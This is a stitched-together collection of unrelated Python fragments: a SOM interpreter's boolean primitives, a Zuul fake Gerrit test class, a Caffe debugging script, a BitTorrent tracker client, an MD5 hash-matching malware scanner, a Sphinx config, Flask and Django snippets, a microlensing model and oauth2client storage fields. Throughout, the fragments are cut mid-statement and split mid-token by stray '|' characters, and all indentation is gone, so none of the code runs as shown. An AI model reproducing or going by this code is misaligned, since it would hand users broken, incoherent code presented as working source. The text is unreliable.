from som.primitives.primitives import Primitives
from som.vm.globals import trueObject, falseObject, nilObject
from som.vmobjects.primitive import UnaryPrimitive, BinaryPrimitive, TernaryPrimitive
if is_ast_interpreter():
from som.vmobjects.block_ast import AstBlock as _Block
else:
from som.vmobjects.block_bc import BcBlock as _Block
def _not(_rcvr):
return falseObject
def _or(_rcvr, _arg):
return trueObject
def _and_and_if_true(_rcvr, arg):
if isinstance(arg, _Block):
block_method = arg.get_method()
return block_method.invoke_1(arg)
return arg
def _if_false(_rcvr, _arg):
return nilObject
def _if_true_if_false(_rcvr, true_block, _false_block):
if isinstance(true_block, _Block):
block_method = true_block.get_method()
return block_method.invoke_1(true_block)
return true_block
class TruePrimitivesBase(Primitives):
def | install_primitives(self):
self._install_instance_primitive(UnaryPri | mitive("not", _not))
self._install_instance_primitive(BinaryPrimitive("or:", _or))
self._install_instance_primitive(BinaryPrimitive("||", _or))
self._install_instance_primitive(BinaryPrimitive("and:", _and_and_if_true))
self._install_instance_primitive(BinaryPrimitive("&&", _and_and_if_true))
self._install_instance_primitive(BinaryPrimitive("ifTrue:", _and_and_if_true))
self._install_instance_primitive(BinaryPrimitive("ifFalse:", _if_false))
self._install_instance_primitive(
TernaryPrimitive("ifTrue:ifFalse:", _if_true_if_false)
)
|
mber": str(self.number),
"subject": self.subject,
"owner": {"name": "User Name"},
"url": "https://hostname/3"},
"patchSet": self.patchsets[patchset - 1],
"author": {"name": "User Name"},
"approvals": [{"type": "Code-Review",
"description": "Code-Review",
"value": "0"}],
"comment": "This is a comment"}
return event
def addApproval(self, category, value, username='reviewer_john',
granted_on=None, message=''):
if not granted_on:
granted_on = time.time()
approval = {
'description': self.categories[category][0],
'type': category,
'value': str(value),
'by': {
'username': username,
'email': username + '@example.com',
},
'grantedOn': int(granted_on)
}
for i, x in enumerate(self.patchsets[-1]['approvals'][:]):
if x['by']['username'] == username and x['type'] == category:
del self.patchsets[-1]['approvals'][i]
self.patchsets[-1]['approvals'].append(approval)
event = {'approvals': [approval],
'author': {'email': 'author@example.com',
'name': 'Patchset Author',
'username': 'author_phil'},
'change': {'branch': self.branch,
'id': 'Iaa69c46accf97d0598111724a38250ae76a22c87',
'number': str(self.number),
'owner': {'email': 'owner@example.com',
'name': 'Change Owner',
'username': 'owner_jane'},
'project': self.project,
'subject': self.subject,
'topic': 'master',
'url': 'https://hostname/459'},
'comment': message,
'patchSet': self.patchsets[-1],
'type': 'comment-added'}
self.data['submitRecords'] = self.getSubmitRecords()
return json.loads(json.dumps(event))
def getSubmitRecords(self):
status = {}
for cat in self.categories.keys():
status[cat] = 0
for a in self.patchsets[-1]['approvals']:
cur = status[a['type']]
cat_min, cat_max = self.categories[a['type']][1:]
new = int(a['value'])
if new == cat_min:
cur = new
elif abs(new) > abs(cur):
cur = new
status[a['type']] = cur
labels = []
ok = True
for typ, cat in self.categories.items():
cur = status[typ]
cat_min, cat_max = cat[1:]
if cur == cat_min:
value = 'REJECT'
ok = False
elif cur == cat_max:
value = 'OK'
else:
value = 'NEED'
ok = False
labels.append({'label': cat[0], 'status': value})
if ok:
return [{'status': 'OK'}]
return [{'status': 'NOT_READY',
'labels': labels}]
def setDependsOn(self, other, patchset):
self.depends_on_change = other
d = {'id': other.data['id'],
'number': other.data['number'],
'ref': other.patchsets[patchset - 1]['ref']
}
self.data['dependsOn'] = [d]
other.needed_by_changes.append(self)
needed = other.data.get('neededBy', [])
d = {'id': self.data['id'],
'number': self.data['number'],
'ref': self.patchsets[patchset - 1]['ref'],
'revision': self.patchsets[patchset - 1]['revision']
}
needed.append(d)
other.data['neededBy'] = needed
def query(self):
self.queried += 1
d = self.data.get('dependsOn')
if d:
d = d[0]
if (self.depends_on_change.patchsets[-1]['ref'] == d['ref']):
d['isCurrentPatchSet'] = True
else:
d['isCurrentPatchSet'] = False
return json.loads(json.dumps(self.data))
def setMerged(self):
if (self.depends_on_change and
self.depends_on_change.data['status'] != 'MERGED'):
return
if self.fail_merge:
return
self.data['status'] = 'MERGED'
self.open = False
path = os.path.join(self.upstream_root, self.project)
repo = git.Repo(path)
repo.heads[self.branch].commit = \
repo.commit(self.patchsets[-1]['revision'])
def setReported(self):
self.reported += 1 |
class FakeGerritConnection(zuul.connection.gerrit.GerritConnection):
log = logging.getLogger("zuul.test.FakeGerritConnection")
def __init__(self, connection_name, connection_config,
changes_db=None, queues_db=None, upstream_root=None):
super(FakeGerritC | onnection, self).__init__(connection_name,
connection_config)
self.event_queue = queues_db
self.fixture_dir = os.path.join(FIXTURE_DIR, 'gerrit')
self.change_number = 0
self.changes = changes_db
self.queries = []
self.upstream_root = upstream_root
def addFakeChange(self, project, branch, subject, status='NEW'):
self.change_number += 1
c = FakeChange(self, self.change_number, project, branch, subject,
upstream_root=self.upstream_root,
status=status)
self.changes[self.change_number] = c
return c
def review(self, project, changeid, message, action):
number, ps = changeid.split(',')
change = self.changes[int(number)]
# Add the approval back onto the change (ie simulate what gerrit would
# do).
# Usually when zuul leaves a review it'll create a feedback loop where
# zuul's review enters another gerrit event (which is then picked up by
# zuul). However, we can't mimic this behaviour (by adding this
# approval event into the queue) as it stops jobs from checking what
# happens before this event is triggered. If a job needs to see what
# happens they can add their own verified event into the queue.
# Nevertheless, we can update change with the new review in gerrit.
for cat in ['CRVW', 'VRFY', 'APRV']:
if cat in action:
change.addApproval(cat, action[cat], username=self.user)
if 'label' in action:
parts = action['label'].split('=')
change.addApproval(parts[0], parts[2], username=self.user)
change.messages.append(message)
if 'submit' in action:
change.setMerged()
if message:
change.setReported()
def query(self, number):
change = self.changes.get(int(number))
if change:
return change.query()
return {}
def simpleQuery(self, query):
self.log.debug("simpleQuery: %s" % query)
self.queries.append(query)
if query.startswith('change:'):
# Query a specific changeid
changeid = query[len('change:'):]
l = [change.query() for change in self.changes.values()
if change.data['id'] == changeid]
elif query.startswith('message:'):
# Query the content of a commit message
msg = query[len('message:'):].strip()
l = [change.query() for change in self.changes.values()
if msg in change.data['commitMessage']]
else:
# Query all open changes
l = [change.query() for change in self.changes.values()]
return l
def _start_watcher_thread(self, *args, **kw):
pass
def getGitUrl(self, project):
return os.path.join(self.upstream_root, project.name)
class |
"""
Load an image from disk
Returns an np.ndarray (channels x width x height)
Arguments:
path -- path to an image on disk
width -- resize dimension
height -- resize dimension
Keyword arguments:
mode -- the PIL mode that the image should be converted to
(RGB for color or L for grayscale)
"""
image = PIL.Image.open(path)
image = image.convert(mode)
image = np.array(image)
# half-crop, half-fill
height_ratio = float(image.shape[0])/height
width_ratio = float(image.shape[1])/width
new_ratio = (width_ratio + height_ratio) / 2.0
resize_width = int(round(image.shape[1] / new_ratio))
resize_height = int(round(image.shape[0] / new_ratio))
if width_ratio > height_ratio and (height - resize_height) % 2 == 1:
resize_height += 1
elif width_ratio < height_ratio and (width - resize_width) % 2 == 1:
resize_width += 1
image = scipy.misc.imresize(image, (resize_height, resize_width), interp='bicubic')
if width_ratio > height_ratio:
start = int(round((resize_width-width)/2.0))
image = image[:,start:start+width]
else:
start = int(round((resize_height-height)/2.0))
image = image[start:start+height,:]
# fill ends of dimension that is too short with random noise
if width_ratio > height_ratio:
padding = (height - resize_height)/2
noise_size = (padding, width, 3)
noise = np.random.randint(0, 255, noise_size).astype('uint8')
image = np.concatenate((noise, image, noise), axis=0)
else:
padding = (width - resize_width)/2
noise_size = (height, padding, 3)
noise = np.random.randint(0, 255, noise_size).astype('uint8')
image = np.concatenate((noise, image, noise), axis=1)
processed = np.zeros((3, width, height), np.float32)
# Transpose from (height, width, channels) to (channels, height, width)
#processed = processed.transpose((2,0,1))
# Channel Swap: RGB -> BGR
#image = image[(2,1,0),:,:]
# Subtract Mean, Swap Channels RGB -> BGR, Transpose (H,W,CH) to (CH,H,W)
#mean_rgb = [104,117,123]
processed[0,:,:] = (image[:,:,2]-104.0)
processed[1,:,:] = (image[:,:,1]-117.0)
processed[2,:,:] = (image[:,:,0]-123.0)
return processed
def forward_pass(image, net, batch_size=None):
"""
Returns scores for each image as an np.ndarray (nImages x nClasses)
Arguments:
images -- a list of np.ndarrays
net -- a caffe.Net
transformer -- a caffe.io.Transformer
Keyword arguments:
batch_size -- how many images can be processed at once
(a high value may result in out-of-memory errors)
"""
net.blobs['data'].data[0] = image
print "net.outputs[-1] = ", net.outputs[-1]
start = time.time()
net.forward()
output = net.blobs[net.outputs[-1]].data
#pool10avg = (net.blobs['pool10'].data).flatten()
#pool10 = pool10avg
#print "conv10 output:\n", net.blobs['conv10'].data
#print "pool10 output:", pool10avg
scores = np.copy(output)
end = time.time()
print 'Inference took %f seconds ...' % (end - start)
return scores
def read_labels(labels_file):
"""
Returns a list of strings
Arguments:
labels_file -- path to a .txt file
"""
if not labels_file:
return None
labels = []
with open(labels_file) as infile:
for line in infile:
label = line.strip()
if label:
| labels.append(label)
assert len(labels), 'No labels found'
return labels
def classify(caffemodel, deploy_file, image_file,
mean_file=None, labels_file=None, batch_size=None, use_gpu=True):
"""
Classify some images against a Caffe model and print the results
Arguments:
caffemodel -- path to a .caffemodel
deploy_file -- path to a .prototxt
image_files -- list of paths to images
Key | word arguments:
mean_file -- path to a .binaryproto
labels_file path to a .txt file
use_gpu -- if True, run inference on the GPU
"""
# Load the model and images
net = get_net(caffemodel, deploy_file, use_gpu)
_, channels, height, width = np.array(net.blobs['data'].shape)
mode = 'RGB'
image = load_image(image_file, height, width, mode)
labels = read_labels(labels_file)
# Structured Input as Image
#W = image.shape[2]
#H = image.shape[1]
#CH = image.shape[0]
#for y in range(H):
# for x in range(W):
# for c in range(CH):
# image[c,x,y] = 1000.0*y+x+c/1000.0#1;
#
# Fixed Parameters for first Filter Bank
# conv1param = np.array(net.params['conv1'][0].data)[:,:,:,:]
# print "shape of conv1param: ", conv1param.shape
# co = conv1param.shape[0]
# ci = conv1param.shape[1]
# kx = conv1param.shape[2]
# ky = conv1param.shape[3]
# pixels = []
# for i in range(ci):
# for o in range(co):
# if i == 0:
# conv1param[o,i] = np.array([[0,0,0],[0,1,0],[0,0,0]])
# else:
# conv1param[o,i] = np.zeros((3,3)) #conv1param[o,i] = np.array([[1,0,0],[0,1,0],[0,1,0]])
#net.params['conv1'][0].data[...] = conv1param
#net.params['conv1'][1].data[...] = np.zeros(net.params['conv1'][1].shape)
# Classify the image
scores = forward_pass(image, net, batch_size=1)
# Fish out some blobs...
indata = np.array(net.blobs['data'].data)[0,:,:,:]
print "shape of indata: ", indata.shape
CH = indata.shape[0]
W = indata.shape[1]
H = indata.shape[2]
pixels = []
for y in range(H):
for x in range(W):
for c in range(CH):
pixel = indata[c,x,y]
if pixel is None: pixel = 99999
pixels.append(pixel);
# Write Pixels to binary file
print("Write to indata File...")
floatstruct = struct.pack('f'*len(pixels), *pixels)
with open("indata.bin", "wb") as f:
f.write(floatstruct)
# Fish out some Parameters...
conv1param = np.array(net.params['conv1'][0].data)[:,:,:,:]
print "shape of conv1param: ", conv1param.shape
co = conv1param.shape[0]
ci = conv1param.shape[1]
kx = conv1param.shape[2]
ky = conv1param.shape[3]
print "conv1 (ci 0, co 0):\n", conv1param[0,0,:,:]
print "conv1 (ci 1, co 0):\n", conv1param[0,1,:,:]
print "conv1 (ci 2, co 0):\n", conv1param[0,2,:,:]
pixels = []
for i in range(ci):
for o in range(co):
for y in range(ky):
for x in range(kx):
pixels.append(conv1param[o,i,x,y]);
# Write Pixels to binary file
print("Write to conv1param File...")
floatstruct = struct.pack('f'*len(pixels), *pixels)
with open("conv1param.bin", "wb") as f:
f.write(floatstruct)
# Fish out some blobs...
conv1res = np.array(net.blobs['conv1'].data)[0,:,:,:]
print "shape of conv1 results: ", conv1res.shape
W = conv1res.shape[2]
H = conv1res.shape[1]
CH = conv1res.shape[0]
pixels = []
for y in range(H):
for x in range(W):
for c in range(CH):
pixels.append(conv1res[c,x,y]);
# Write Pixels to binary file
print("Write to conv1res File...")
floatstruct = struct.pack('f'*len(pixels), *pixels)
with open("conv1res.bin", "wb") as f:
f.write(floatstruct)
# Fish out fire2/sq1x1 blobs...
d = np.array(net.blobs['fire2/squeeze1x1'].data)[0,:,:,:]
print "shape of fire2/squeeze1x1 results: ", d.shape
W = d.shape[2]
H = d.shape[1]
CH = d.shape[0]
pixels = []
for y in range(H):
for x in range(W):
for c in range(CH):
pixels.append(d[c,x,y]);
# Write Pixels to binary file
print("Write to f2s1 File...")
floatstruct = struct.pack('f'*len(pixels), *pixels)
with open("f2s1.bin", "wb") as f:
f.write(floatstruct)
# Fish out fire2/ex1x1 blobs...
d = np.array(net.blob |
bencode import bdecode
from threading import Thread, Lock
from socket import error, gethostbyname
from time import time
from random import randrange
from binascii import b2a_hex
class Rerequester:
def __init__(self, url, interval, sched, howmany, minpeers,
connect, externalsched, amount_left, up, down,
port, ip, myid, infohash, timeout, errorfunc, maxpeers, doneflag,
upratefunc, downratefunc, ever_got_incoming):
# The URL and query paramters to always pass.
self.url = ('%s?info_hash=%s&peer_id=%s&port=%s&key=%s' %
(url, quote(infohash), quote(myid), str(port),
b2a_hex(''.join([chr(randrange(256)) for i in xrange(4)]))))
# The IP address of this client.
self.ip = ip
# The time in seconds between requesting more peers.
self.interval = interval
# The last time this client got a reply from the tracker.
self.last = None
# The identifier returned by the tracker, which this client uses on subsequent requests.
self.trackerid = None
# Maximum seconds between sending requests to the tracker.
self.announce_interval = 30 * 60
# Function to schedule events in the reactor loop of RawServer.
self.sched = sched
# Method that returns how many peers this client is connected to.
self.howmany = howmany
# If connected to this many peers, may skip making a request to the tracker.
self.minpeers = minpeers
# Method on Connecter that starts a connection to a peer.
self.connect = connect
# Function to schedule events in the reactor loop of RawServer.
self.externalsched = externalsched
# Method to get the amount of data left.
self.amount_left = amount_left
# Method to get the total bytes uploaded.
self.up = up
# Method to get the total bytes downloaded.
self.down = down
# HTTP timeout when making a request to the tracker.
self.timeout = timeout
# Callback invoked with a string describing any error.
self.errorfunc = errorfunc
# If connected to this many peers, will not request any more from the tracker.
self.maxpeers = maxpeers
# Flag set if we have all pieces and are seeding.
self.doneflag = doneflag
# Method to get the upload rate.
self.upratefunc = upratefunc
# Method to get the download rate.
self.downratefunc = downratefunc
# Method that returns True if we ever got an incoming connection.
self.ever_got_incoming = ever_got_incoming
# True if the last request to the tracker failed.
self.last_failed = True
# The last time this client made a request to the tracker.
self.last_time = 0
def c(self):
# Call this method again later.
self.sched(self.c, self.interval)
# Determine if we need more peers from the tracker.
if self.ever_got_incoming():
# Got an incoming connection.
getmore = self.howmany() <= self.minpeers / 3
else:
# Never got an incoming connection.
# Assume this client is behind a NAT, and aggressively try and connect to other peers.
getmore = self.howmany() < self.minpeers
if getmore or time() - self.last_time > self.announce_interval:
# Need to connect to more peers, or need to simply check-in with the tracker.
self.announce()
def begin(self):
# Method c is the method called at regular intervals to contact the tracker.
self.sched(self.c, self.interval)
# But contact the tracker now. Setting event = 0 specifies starting the download.
self.announce(0)
def announce(self, event = None):
# Update the time we last made a request to the tracker.
self.last_time = time()
# Append total uploaded, total downloaded, and bytes left to download.
s = ('%s&uploaded=%s&downloaded=%s&left=%s' %
(self.url, str(self.up()), str(self.down()),
str(self.amount_left())))
if self.last is not None:
# Append the last time this client made a request to the tracker.
s += '&last=' + quote(str(self.last))
if self.trackerid is not None:
# If not the first request, append the id this tracker previously returned.
s += '&trackerid=' + quote(str(self.trackerid))
if self.howmany() >= self.maxpeers:
# Don't need any more peers to connect to.
s += '&numwant=0'
else:
# Return peer IP and port addresses in 6 binary bytes.
s += '&compact=1'
# Event is not specified if this request is one performed at regular intervals.
if event != None:
s += '&event=' + ['started', 'completed', 'stopped'][event]
# Method that returns True the first time and False every subsequent time.
set = SetOnce().set
def checkfail(self = self, set = set):
if set():
# Only get here if the tracker did not reply and call set() in rerequest first.
if self.last_failed and self.upratefunc() < 100 and self.downratefunc() < 100:
self.errorfunc('Problem connecting to tracker - timeout exceeded')
self.last_failed = True
# Method checkfail will run if the tracker does not reply to this request.
self.sched(checkfail, self.timeout)
Thread(target = self.rerequest, args = [s, set]).start()
def rerequest(self, url, set):
# url is s from method announce.
try:
| if self.ip:
# Include our IP address in case we are communicating throu | gh a proxy.
url += '&ip=' + gethostbyname(self.ip)
# Read a reply.
h = urlopen(url)
r = h.read()
h.close()
if set():
# Only get here if checkfail did not run and call set() first.
def add(self = self, r = r):
# This call succeeded.
self.last_failed = False
# Process the reply.
self.postrequest(r)
self.externalsched(add, 0)
except (IOError, error), e:
if set():
# Only get here if checkfail did not run and call set() first.
def fail(self = self, r = 'Problem connecting to tracker - ' + str(e)):
if self.last_failed:
self.errorfunc(r)
self.last_failed = True
self.externalsched(fail, 0)
def postrequest(self, data):
try:
r = bdecode(data)
check_peers(r)
if r.has_key('failure reason'):
self.errorfunc('rejected by tracker - ' + r['failure reason'])
else:
if r.has_key('warning message'):
self.errorfunc('warning from tracker - ' + r['warning message'])
self.announce_interval = r.get('interval', self.announce_interval)
self.interval = r.get('min interval', self.interval)
self.trackerid = r.get('tracker id', self.trackerid)
self.last = r.get('last')
p = r['peers']
peers = []
if type(p) == type(''):
# Deserialize the compact binary form.
for x in xrange(0, len(p), 6):
ip = '.'.join([str(ord(i)) for i in p[x:x+4]])
port = (ord(p[x+4]) << 8) | ord(p[x+5])
peers.append((ip, port, None))
else:
for x in p:
peers.append((x['ip'], x['port'], x.get('peer id')))
ps = len(peers) + self.howmany()
if ps < self.maxpeers:
if self.doneflag.isSet():
if r.get('num peers', 1000) - r.get('done peers', 0) > ps * 1.2:
self.last = |
# -*- coding: utf-8 -*-
# Author : Repubic of Korea, Seoul, JungSan HS 31227 Lee Joon Sung
# Author_Helper : Republic of Korea, KyungGido, Kim Min Seok
# youtube : anonymous0korea0@gmail.com | ;;;; tayaka
# Email : miho0_0@naver.com
import hashlib
import logging
#from FoxDBinfor | import DB_Pattern
def Matching_Hash_Value(fname, File_Hash_List):
logger = logging.getLogger("FoxVc")
slogger = logging.getLogger("Scan")
blacklist = ["bin", "BIN", "$RECYCLE", "$RECYCLE.BIN"] # 휴지통을 블랙리스트로 넣음
try:
with open(fname, 'rb') as f:
buf = f.read()
md5 = hashlib.md5()
md5.update(buf)
# end with-open
fmd5 = md5.hexdigest()
for hashValue in File_Hash_List: # for문으로 리스트를 돌림.
if fmd5 == hashValue: # 만약 파일의 md5해시가 멀웨어 DB에 존재한다면..
#INFECTION.append(fname) # INFECTION 리스트에 추가함.
return 1
return 0
except IOError as e:
logger.error("IOError : Permission denied. / No such file or directory.")
logger.error(e.message)
finally:
pass
|
# -*- c | oding: utf-8 -*-
__version__ = '1.1.0'
defa | ult_app_config = 'ipware.apps.AppConfig'
|
import os
root_dir = os.path.dirname(os.path.realpath(__file__ | ))
f = open(".modulerc", "w")
f.write("#%Module\n")
sub_dirs = os.wa | lk(root_dir)
next(sub_dirs)
for dir_name, _, file_list in sub_dirs:
for file_name in file_list:
module_version = file_name.rstrip(".lua")
module_name = os.path.relpath(dir_name, root_dir)
f.write("hide-version %s/%s\n" % (module_name, module_version))
|
xecfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import alabaster
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('../../'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
needs_sphinx = '1.3'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.todo',
'sphinx.ext.coverage',
'sphinx.ext.mathjax',
'sphinx.ext.viewcode',
'sphinx.ext.napoleon'
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'ecstasy'
copyright = u'2015, Peter Goldsborough'
author = u'Peter Goldsborough'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1'
# The full version, including alpha/beta/rc tags.
release = '1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
html_theme_options = {
'github_user': 'goldsborough',
'github_repo': 'ecstasy',
'github_banner': True,
'travis_button': "true",
'gratipay_user': "goldsborough",
'extra_nav_links': {"Github Repository": "github.com/goldsborough/ecstasy"}
}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = [alabaster.get_path()]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
html_title = "ecstasy"
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rend | ered to pages, maps page names to
# template names.
#html_additional_pages = {}
|
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'ecstasydoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'ecstasy.tex', u'ecstasy Documentation',
u'Peter Goldsborough', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after |
''' Initiation procedure for the auth modul | e
Yields:
- Initiates the Login Manager
'''
# ---------------------------------------------------------------------------
# Imports
# ---------------------------------------------------------------------------
from flask_login import LoginManager
from .. import app
# ---------------------------------------------------------------------------
# Define and Configure the login manager
# ---------------------------------------------- | -----------------------------
login_manager = LoginManager()
login_manager.login_view = "auth.signin"
login_manager.init_app(app) |
from flask import render_template
|
def home():
return rend | er_template('index.html') |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-09-09 10:54
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('groups', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Event',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, seriali | ze=False, verbose_name='ID')),
('title', models.CharField(max_length=30)),
('description', models.TextField()),
('subject', models.CharField(max_length=20)),
('event_type', models.CharField(choices=[('quiz', 'Quiz'), ('test', 'Test'), ('homework', 'Homework')], max | _length=8)),
('due', models.DateTimeField()),
('group', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='groups.Group')),
],
),
]
|
# -*-coding | :Utf-8 -*
# ====== | ==============================================================
# ====================================================================
# Packages
# ====================================================================
import sys
import numpy as np
from muLAn.models.multipole import hexamag
# ====================================================================
# Functions
# ====================================================================
def magnifcalc(t, param, Ds=None, tb=None):
"""Return the hexadecapolar approximation of the magnification."""
### Get parameters
t0 = param['t0']
u0 = param['u0']
tE = param['tE']
rho = param['rho']
gamma = param['gamma']
q = param['q']
piEN = param['piEN']
piEE = param['piEE']
alpha0 = param['alpha']
s0 = param['s']
dalpha = param['dadt']
ds = param['dsdt']
### Lens orbital motion
alpha, s = lens_rotation(alpha0, s0, dalpha, ds, t, tb)
### Parallax
DsN = Ds['N']
DsE = Ds['E']
tau = (t-t0)/tE + piEN * DsN + piEE * DsE
beta = u0 + piEN * DsE - piEE * DsN
x, y = binrot(alpha, tau, beta)
### Conversion center of mass to Cassan (2008)
x = x - s*q/(1.+q)
### Compute magnification
zeta0 = x + 1j*y
return np.array([hexamag(s[i], q, rho, gamma, zeta0[i]) for i in range(len(x))])
# --------------------------------------------------------------------
def binrot(theta, x_old, y_old):
"""Rotation by an angle alpha.
:param theta: float, angle in radians.
:param x_old: numpy array, x coodinate in the old frame.
:param y_old: numpy array, y coodinate in the old frame.
:return x_new: numpy array, x coodinate in the new frame.
:return y_new: numpy array, y coodinate in the new frame.
"""
cos_theta = np.cos(theta)
sin_theta = np.sin(theta)
x_new = x_old * cos_theta - y_old * sin_theta
y_new = x_old * sin_theta + y_old * cos_theta
return x_new, y_new
# --------------------------------------------------------------------
def lens_rotation(alpha0, s0, dalpha, ds, t, tb):
"""Compute the angle alpha and projected separation s for each
time step due to the lens orbital motion.
:param alpha0: angle alpha at date tb.
:param s0: projected separation at date tb.
:param dalpha: float, angular velocity at date tb
(radians.year^-1).
:param ds: change rate of separation (year^-1).
:param t: list of dates.
:param tb: time reference for linear development.
:type alpha0: float
:type s0: float
:type dalpha: float
:type ds: float
:type t: numpy array
:type tb: float
:return: unpacked list of actual alpha and s values at each date.
:rtype: numpy array, numpy array
"""
Cte_yr_d = 365.25 # Julian year in days
alpha = alpha0 - (t - tb) * dalpha / Cte_yr_d
s = s0 + (t-tb) * ds / Cte_yr_d
return alpha, s
|
# Copyright (C) 2010 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""OAuth 2.0 utilities for Django.
Utilities for using OAuth 2.0 in conjunction with
the Django datastore.
"""
__author__ = 'jcgregorio@google.com (Joe Gregorio)'
import oauth2client
import base64
import pickle
from django.db import models
from oauth2client.client import Storage as BaseStorage
class CredentialsField(models.Field):
def __init__(self, *args, **kwargs):
if 'null' not in kwargs:
kwargs['null'] = True
super(CredentialsField, self).__init__(*args, **kwargs)
def get_internal_type(self):
return "TextField"
def from_db_value(self, value, expression, connection):
if value is None:
return value
return pickle.loads(base64.b64decode(value))
def to_python(self, value):
if value is None:
return None
if isinstance(value, oauth2client.client.Credentials):
return value
return pickle.loads(base64.b64decode(value))
def get_db_prep_value(self, value, connection, prepared=False):
if value is None:
return None
return base64.b64e | ncode(pickle.dumps(value))
def deconstruct(self):
n | ame, path, args, kwargs = super().deconstruct()
del kwargs['null']
return name, path, args, kwargs
class FlowField(models.Field):
def __init__(self, *args, **kwargs):
if 'null' not in kwargs:
kwargs['null'] = True
super(FlowField, self).__init__(*args, **kwargs)
def get_internal_type(self):
return "TextField"
def to_python(self, value):
if value is None:
return None
